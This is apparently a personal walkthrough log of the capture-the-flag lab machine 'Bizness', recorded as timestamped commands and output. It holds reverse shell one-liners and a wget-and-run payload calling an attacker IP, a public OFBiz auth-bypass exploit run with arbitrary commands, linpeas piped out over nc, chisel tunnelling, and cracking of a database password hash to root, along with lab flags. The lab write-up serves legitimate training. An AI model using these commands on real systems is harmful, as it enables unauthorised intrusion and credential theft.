
2024-01-12 13:17:21 CST -- START TIME
###		Bizness		###
--------------------------------------


|================================================================
- Name: bizness 
- IP Address: 10.129.40.66
- OS: Debian GNU/Linux 11 (bullseye)/5.10.0-26-amd64/x64
- Notes: 

//CREDS:
# root : monkeybizness

//Flags:
#User:		c229ee72d1676320ca3846d8222418dd
#System:	f1a1d0bc64c5d9a1c75ac77a525ae0b7

|================================================================
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

ping -c1 10.129.40.66


// nmap --
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

// SCAN
ip=10.129.40.66
ports=$(nmap -Pn -p- --min-rate=1000 -T4 $ip | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

echo $ports
//22,80,443,39811

sudo nmap -Pn -A -p$ports $ip -oN tcp.nmap

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
|   256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_  256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp    open  http       nginx 1.18.0
|_http-title: Did not follow redirect to https://bizness.htb/
|_http-server-header: nginx/1.18.0
443/tcp   open  ssl/http   nginx 1.18.0
| tls-alpn: 
|_  http/1.1
|_http-title: Did not follow redirect to https://bizness.htb/
|_http-server-header: nginx/1.18.0
| tls-nextprotoneg: 
|_  http/1.1
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=UK
| Not valid before: 2023-12-14T20:03:40
|_Not valid after:  2328-11-10T20:03:40
|_ssl-date: TLS randomness does not represent time
39811/tcp open  tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 - 5.4 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


# UDP scan
sudo nmap -Pn -sU --top-ports 100 $ip -oN udp.nmap

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


-- add /etc/hosts file entries --
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

# add /etc/hosts entry nix
sudo sh -c "echo '10.129.40.66\tbizness.htb' >> /etc/hosts"
cat /etc/hosts

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
2024-01-12 13:33:33 CST -- 
whatweb -a 1 http://bizness.htb/

http://bizness.htb/ [301 Moved Permanently] Country[RESERVED][ZZ], HTTPServer[nginx/1.18.0], IP[10.129.40.66], RedirectLocation[https://bizness.htb/], Title[301 Moved Permanently], nginx[1.18.0]
https://bizness.htb/ [200 OK] Bootstrap, Cookies[JSESSIONID], Country[RESERVED][ZZ], Email[info@bizness.htb], HTML5, HTTPServer[nginx/1.18.0], HttpOnly[JSESSIONID], IP[10.129.40.66], JQuery, Lightbox, Script, Title[BizNess Incorporated], nginx[1.18.0]


//WebInfo
Powered by Apache OFBiz
Designed by BootstrapMade 


// EXPLOIT: Apache-OFBiz-Authentication-Bypass
// (CVE-2023-51467 and CVE-2023-49070)
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
# https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass

git clone https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass.git


2024-01-12 13:42:58 CST -- 
//Scan for exploit
python exploit.py -h 
usage: exploit.py [-h] --url URL [--cmd CMD]

Exploit script for Apache EFBiz auth vulnerability (CVE-2023-49070 and CVE-2023-51467).

options:
  -h, --help  show this help message and exit
  --url URL   EFBIZ's URL to send requests to.
  --cmd CMD   Command to run on the remote server. Optional.

2024-01-12 13:44:06 CST -- 
python exploit.py --url http://bizness.htb
[+] Scanning started...
[+] Apache OFBiz instance seems to be vulnerable.

//TestCommunication BAck
python exploit.py --url http://bizness.htb --cmd 'ping -c10 10.10.16.30'

//Success on Pings!!!

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


// RevShell
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
#StartListener
sudo rlwrap -cAr nc -lvnp 443

#Exploit
2024-01-12 14:04:20 CST -- 
python exploit.py --url https://bizness.htb --cmd '/bin/bash -i >& /dev/tcp/10.10.16.30/443 0>&1'
//Fail

#Exploit
2024-01-12 14:05:02 CST -- 
python exploit.py --url https://bizness.htb --cmd 'nc 10.10.16.30 443 -e /bin/bash'
//FAil

#Exploit
2024-01-12 14:06:18 CST -- 
python exploit.py --url https://bizness.htb --cmd 'nc -c /bin/bash 10.10.16.30 443'
//FAil


cat revshell.sh 
#!/usr/bin/env bash

/bin/bash -i >& /dev/tcp/10.10.16.30/443 0>&1

sudo python -m http.server 80

2024-01-12 14:11:02 CST -- 
python exploit.py --url https://bizness.htb --cmd 'wget http://10.10.16.30/revshell.sh -O /tmp/revshell.sh'
python exploit.py --url https://bizness.htb --cmd 'chmod 777 /tmp/revshell.sh'
python exploit.py --url https://bizness.htb --cmd '/tmp/revshell.sh'

2024-01-12 18:57:28 CST -- 
//SUccess!!!


//NOTE: THIS WORKS
python exploit.py --url https://bizness.htb --cmd 'nc -e /bin/bash 10.10.16.30 443'

id
uid=1001(ofbiz) gid=1001(ofbiz-operator) groups=1001(ofbiz-operator)

python3 -c 'import pty; pty.spawn("/bin/bash")'
// =)

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


cat /home/ofbiz/user.txt
//c229ee72d1676320ca3846d8222418dd


# PWNED 
 \
   .-.
 ((x x)) xGh05t
  | - \-|
   \   \
   `~~~'


// ENUM(ofbiz)
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
hostname
bizness

uname -a
Linux bizness 5.10.0-26-amd64 #1 SMP Debian 5.10.197-1 (2023-09-29) x86_64 GNU/Linux

cat /etc/*elease | egrep -i pretty
PRETTY_NAME="Debian GNU/Linux 11 (bullseye)"

id
uid=1001(ofbiz) gid=1001(ofbiz-operator) groups=1001(ofbiz-operator)

sudo -l
sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper
sudo: a password is required



-- upgrade shell --
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

2024-01-12 19:03:06 CST -- 
# python method
python3 -c 'import pty; pty.spawn("/bin/bash")'

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


sudo -l
//Do Not know ofbiz password

env
SHELL=/bin/bash
JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64
PWD=/home/ofbiz
LOGNAME=ofbiz
HOME=/home/ofbiz
LANG=en_US.UTF-8
LS_COLORS=
INVOCATION_ID=69a27224c60c48e5ad206e2e64f071d5
USER=ofbiz
SHLVL=3
JOURNAL_STREAM=8:14328
PATH=/usr/lib/jvm/java-11-openjdk-amd64/bin:/bin:/sbin:/usr/bin:/usr/sbin:/usr/lib/jvm/java-11-openjdk-amd64/bin:/usr/lib/jvm/java-11-openjdk-amd64/bin
OLDPWD=/opt/ofbiz
_=/bin/env

cat /etc/passwd

find / -type f -perm -4000 2>/dev/null
/usr/bin/mount
/usr/bin/su
/usr/bin/fusermount
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/umount
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


// privesc --
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

# Local network
// Install peass
sudo apt install -y peass
cp /usr/share/peass/linpeas/linpeas.sh .

// Download, execute from memory, & save output on kali
  // KALI term1
sudo python3 -m http.server 80
  // KALI term2
nc -lvnp 443 | tee linpeas.out

2024-01-12 19:08:04 CST -- 
  // CurlTarget
curl 10.10.16.30:80/linpeas.sh | sh | nc 10.10.16.30 443

// view linpeas output
less -R linpeas.out

╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services
/etc/systemd/system/multi-user.target.wants/ofbiz.service is calling this writable executable: /opt/ofbiz/gradlew
/etc/systemd/system/multi-user.target.wants/ofbiz.service is calling this writable executable: /opt/ofbiz/gradlew
/etc/systemd/system/ofbiz.service is calling this writable executable: /opt/ofbiz/gradlew
/etc/systemd/system/ofbiz.service is calling this writable executable: /opt/ofbiz/gradlew

ls -lah /opt/ofbiz/gradlew
-rwxr-xr-x 1 ofbiz ofbiz-operator 6.0K Oct 13 12:04 /opt/ofbiz/gradlew

file /opt/ofbiz/gradlew
/opt/ofbiz/gradlew: a /usr/bin/env sh script, ASCII text executable


╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 127.0.0.1:8443          :::*                    LISTEN      825/java            
tcp6       0      0 127.0.0.1:10523         :::*                    LISTEN      825/java            
tcp6       0      0 :::443                  :::*                    LISTEN      -                   
tcp6       0      0 :::39811                :::*                    LISTEN      777/java            
tcp6       0      0 127.0.0.1:8009          :::*                    LISTEN      825/java            
tcp6       0      0 127.0.0.1:8080          :::*                    LISTEN      825/java            
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      - 

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


// chisel
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

// browse to https://github.com/jpillora/chisel/releases
// get correct download links


// download chisel for linux
wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_linux_amd64.gz

gunzip chisel_1.9.1_linux_amd64.gz
chmod +x chisel_1.9.1_linux_amd64
mv chisel_1.9.1_linux_amd64 chisel

// linux server with target client calling back
  // kali
sudo ./chisel server --port 6969 --reverse --socks5
//iIHNlwSTPPlRXMIDzPInYIy//MUYYp08BUDul9aYsZ0=

  // target
// upload chisel.exe
sudo python -m http.server 80

wget http://10.10.16.30/chisel
chmod +x chisel


2024-01-12 20:14:16 CST -- 
// socks5 proxy
./chisel client --fingerprint 'iIHNlwSTPPlRXMIDzPInYIy//MUYYp08BUDul9aYsZ0=' 10.10.16.30:6969 R:9050:socks


// nmap --
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

// SCAN
ip=127.0.0.1
ports=443,80,22,8443,10523,39811,8009,8080

echo $ports
//443,80,22,8443,10523,39811,8009,8080

2024-01-12 20:30:03 CST -- 
proxychains4 -q nmap -Pn -sV -p$ports $ip -oN tcp_proxy.nmap

PORT      STATE SERVICE       VERSION
22/tcp    open  ssh           OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
80/tcp    open  http          nginx 1.18.0
443/tcp   open  ssl/http      nginx 1.18.0
8009/tcp  open  ajp13         Apache Jserv (Protocol v1.3)
8080/tcp  open  http-proxy
8443/tcp  open  ssl/https-alt
10523/tcp open  unknown
39811/tcp open  unknown

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>



>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


// PrivEsc-Redux
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
ls -lah /opt/ofbiz/framework/resources/templates

-rw-r--r-- 1 ofbiz ofbiz-operator 1.4K Oct 13 12:04 AdminNewTenantData-Derby.xml
-rw-r--r-- 1 ofbiz ofbiz-operator 1.4K Oct 13 12:04 AdminNewTenantData-MySQL.xml
-rw-r--r-- 1 ofbiz ofbiz-operator 1.4K Oct 13 12:04 AdminNewTenantData-Oracle.xml
-rw-r--r-- 1 ofbiz ofbiz-operator 1.4K Oct 13 12:04 AdminNewTenantData-PostgreSQL.xml
-rw-r--r-- 1 ofbiz ofbiz-operator 1.1K Oct 13 12:04 AdminUserLoginData.xml
-rw-r--r-- 1 ofbiz ofbiz-operator 1.2K Oct 13 12:04 build.gradle
-rw-r--r-- 1 ofbiz ofbiz-operator 3.3K Oct 13 12:04 CommonScreens.xml
-rw-r--r-- 1 ofbiz ofbiz-operator 2.1K Oct 13 12:04 controller.xml
-rw-r--r-- 1 ofbiz ofbiz-operator  843 Oct 13 12:04 DemoData.xml
-rw-r--r-- 1 ofbiz ofbiz-operator 1.4K Oct 13 12:04 document.xml
-rw-r--r-- 1 ofbiz ofbiz-operator 1.4K Oct 13 12:04 entitymodel.xml
-rw-r--r-- 1 ofbiz ofbiz-operator 1.1K Oct 13 12:04 Forms.xml
-rw-r--r-- 1 ofbiz ofbiz-operator 1.3K Oct 13 12:04 HELP.xml
-rw-r--r-- 1 ofbiz ofbiz-operator  806 Oct 13 12:04 index.jsp
-rw-r--r-- 1 ofbiz ofbiz-operator 1.3K Oct 13 12:04 Menus.xml
-rw-r--r-- 1 ofbiz ofbiz-operator 2.9K Oct 13 12:04 ofbiz-component.xml
-rw-r--r-- 1 ofbiz ofbiz-operator  187 Oct 13 12:04 README.txt
-rw-r--r-- 1 ofbiz ofbiz-operator 1.6K Oct 13 12:04 Screens.xml
-rw-r--r-- 1 ofbiz ofbiz-operator 1.7K Oct 13 12:04 SecurityGroupDemoData.xml
-rw-r--r-- 1 ofbiz ofbiz-operator 1.7K Oct 13 12:04 SecurityPermissionSeedData.xml
-rw-r--r-- 1 ofbiz ofbiz-operator 1.3K Oct 13 12:04 services.xml
-rw-r--r-- 1 ofbiz ofbiz-operator 1021 Oct 13 12:04 Tests.xml
-rw-r--r-- 1 ofbiz ofbiz-operator  843 Oct 13 12:04 TypeData.xml
-rw-r--r-- 1 ofbiz ofbiz-operator 2.2K Oct 13 12:04 UiLabels.xml
-rw-r--r-- 1 ofbiz ofbiz-operator 5.0K Oct 13 12:04 web.xml


//Trying to crack the Apache Derby database

cd /opt/ofbiz/runtime/data/derby/ofbiz/seg0

2024-01-12 23:11:32 CST --
// -a Process a binary file as if it were text
// -r Recursive
// -i Ignore case
// -n, Prefix each line of output with the 1-based line number within its input file

egrep -arin currentPassword .

//Found:
//currentPassword="$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I"

//THe "$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I" defines the SHA which means it uses “SHA-1” hashing algorithm and “d” for salt and “uP0_QaVBpDWFeo8-dRzDqRwXQ2I” remaining the value.

gunzip /usr/share/wordlists/rockyou.txt.gz -c > /home/kali/haxterm/data/Bizness/rockyou.txt

//passCrack.py options
hash_type = "SHA1"
salt = "d"
search = "$SHA1$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I"
wordlist = '/home/kali/haxterm/data/Bizness/rockyou.txt'

python passCrack.py
//Found Password:monkeybizness, hash:$SHA1$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I=


su -
//monkeybizness

id
uid=0(root) gid=0(root) groups=0(root)

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

cat /root/root.txt
//f1a1d0bc64c5d9a1c75ac77a525ae0b7


# PWNED 
 \
   .-.
 ((x x)) xGh05t
  | - \-|
   \   \
   `~~~'


// EXTRA
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
cat /etc/shadow

//For yescrypt($y$)
john --wordlist=rockyou.txt --format=crypt unshadow

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


2024-01-13 00:09:34 CST -- COMPLETE


